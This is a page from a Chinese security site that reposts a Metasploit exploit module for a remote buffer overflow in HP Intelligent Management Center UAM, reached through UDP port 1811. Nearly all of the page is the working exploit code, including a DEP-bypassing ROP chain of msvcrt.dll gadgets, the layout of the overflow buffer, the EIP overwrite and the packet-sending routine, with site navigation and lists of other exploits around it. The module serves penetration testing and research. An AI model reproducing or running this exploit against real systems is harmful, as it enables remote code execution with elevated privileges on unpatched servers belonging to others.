首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP Intelligent Management Center UAM Buffer Overflow
来源:http://www.metasploit.com 作者:sinn3r 发布时间:2012-11-02  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'HP Intelligent Management Center UAM Buffer Overflow',
			'Description'    => %q{
				This module exploits a remote buffer overflow in HP Intelligent Management Center
				UAM. The vulnerability exists in the uam.exe component, when using sprint in a
				insecure way for logging purposes. The vulnerability can be triggered by sending a
				malformed packet to the 1811/UDP port. The module has been successfully tested on
				HP iMC 5.0 E0101 and UAM 5.0 E0102 over Windows Server 2003 SP2 (DEP bypass).
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability discovery
					'sinn3r', # Metasploit module
					'juan vazquez' # Metasploit module
				],
			'References'     =>
				[
					['OSVDB', '85060'],
					['BID', '55271'],
					['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-171']
				],
			'Payload'        =>
				{
					'BadChars' => "\x00\x0d\x0a",
					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -3500
					'Space' => 3925,
					'DisableNops' => true
				},
			'Platform'       => ['win'],
			'Targets'        =>
				[
					[ 'HP iMC 5.0 E0101 / UAM 5.0 E0102 on Windows 2003 SP2',
						{
							'Offset' => 4035,
						}
					]
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Aug 29 2012',
			'DefaultTarget'  => 0))

		register_options([Opt::RPORT(1811)], self.class)
	end

	def junk(n=4)
		return rand_text_alpha(n).unpack("V")[0].to_i
	end

	def nop
		return make_nops(4).unpack("V")[0].to_i
	end

	def send_echo_reply(operator)
		packet = [0xF7103D21].pack("N") # command id
		packet << rand_text(18)
		packet << [0x102].pack("n") # watchdog command type => echo reply
		packet << "AAAA" # ip (static to make offset until EIP static)
		packet << "AA" # port (static to make offset until EIP static)
		packet << operator # Operator max length => 4066, in order to bypass packet length restriction: 4096 total

		connect_udp
		udp_sock.put(packet)
		disconnect_udp
	end


	def exploit

		# ROP chain generated with mona.py - See corelan.be
		rop_gadgets =
			[
				0x77bb2563, # POP EAX # RETN
				0x77ba1114, # <- *&VirtualProtect()
				0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
				junk,
				0x77bb0c86, # XCHG EAX,ESI # RETN
				0x77bc9801, # POP EBP # RETN
				0x77be2265, # ptr to 'push esp #  ret'
				0x77bb2563, # POP EAX # RETN
				0x03C0990F,
				0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0x500 -> ebx)
				0x77bb48d3, # POP EBX, RET
				0x77bf21e0, # .data
				0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
				0x77bbfc02, # POP ECX # RETN
				0x77bef001, # W pointer (lpOldProtect) (-> ecx)
				0x77bd8c04, # POP EDI # RETN
				0x77bd8c05, # ROP NOP (-> edi)
				0x77bb2563, # POP EAX # RETN
				0x03c0984f,
				0x77bdd441, # SUB EAX, 03c0940f
				0x77bb8285, # XCHG EAX,EDX # RETN
				0x77bb2563, # POP EAX # RETN
				nop,
				0x77be6591, # PUSHAD # ADD AL,0EF # RETN
			].pack("V*")

		bof = rand_text(14)
		bof << rop_gadgets
		bof << payload.encoded
		bof << "C" * (target['Offset'] - 14 - rop_gadgets.length - payload.encoded.length)
		bof << [0x77bb0c86].pack("V") # EIP => XCHG EAX,ESI # RETN # from msvcrt.dll
		bof << [0x77bcc397].pack("V") # ADD EAX,2C # POP EBP # RETN # from msvcrt.dll
		bof << [junk].pack("V") # EBP
		bof << [0x77bcba5e].pack("V") # XCHG EAX,ESP # RETN # from msvcrt.dll

		print_status("Trying target #{target.name}...")
		send_echo_reply(rand_text(20)) # something like... get up! ?
		send_echo_reply(bof) # exploit
	end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Konqueror 4.7.3 Memory Corrupt
·Internet Explorer 9 Memory Cor
·Adobe Reader 11.0.0 Stack Over
·OpenSSH 6.0p1 Backdoor Patch 1
·Aladdin Knowledge System Ltd C
·HP Intelligent Management Cent
·BigAnt Server 2.52 SP5 SEH Sta
·RealPlayer 15.0.6.14(.3g2) Wri
·KMPlayer v3.3.0.33 Multiple Vu
·Joomla Component com_jce remot
·EMC Networker Format String
·WinRM VBS Remote Code Executio
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved